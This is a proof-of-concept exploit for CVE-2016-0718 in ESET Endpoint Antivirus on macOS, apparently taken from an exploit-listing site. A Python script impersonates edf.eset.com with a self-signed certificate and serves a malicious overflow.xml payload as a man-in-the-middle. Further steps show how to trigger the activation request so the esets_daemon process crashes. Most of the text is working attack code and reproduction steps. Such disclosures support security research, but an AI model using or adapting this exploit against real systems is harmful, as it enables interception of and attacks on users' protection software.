## https://sploitus.com/exploit?id=SSV:92725
# Extract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490
# (ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the
# following Python program:
import BaseHTTPServer, SimpleHTTPServer, ssl, subprocess
class XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_POST(self):
with open("overflow.xml") as f:
xml = f.read()
self.send_response(200)
self.send_header("Content-Type", "text/xml")
self.send_header("Content-Length", len(xml))
self.end_headers()
self.wfile.write(xml)
def do_CONNECT(self):
self.wfile.write("HTTP/1.1 200 Connection Established\r\n")
self.end_headers()
self.connection = ssl.wrap_socket(
self.connection, certfile="/tmp/xml.crt",
keyfile="/tmp/xml.key", server_side=True)
self.rfile = self.connection.makefile("rb", self.rbufsize)
self.wfile = self.connection.makefile("wb", self.wbufsize)
self.close_connection = 0
subprocess.call("openssl req -newkey rsa:2048 -x509 -nodes -subj " +
"/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key",
shell=True)
BaseHTTPServer.HTTPServer(("localhost", 4443), XmlHandler).serve_forever()
#________________________________________________________________________________
#
# Next, open the ESET Endpoint Antivirus UI, choose "Setup --> Enter application
# preferences...", and enable a local proxy server for localhost:4443 (this proxy
# configuration is used to simulate a man-in-the-middle attack; a real-world
# attack would not require a victim to enable a proxy server).
#
# Next, in the ESET Endpoint Antivirus UI, choose "Help --> Activate Product",
# enter any License Key value you like (such as 0000-0000-0000-0000-0000), and
# press "Activate".
#
# The esets_daemon process will immediately crash (the public PoC overflow.xml
# file used above just demonstrates that the vulnerability exists; it does not
# perform actual code execution). You can confirm this by running
# /Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that
# esets_daemon crashed.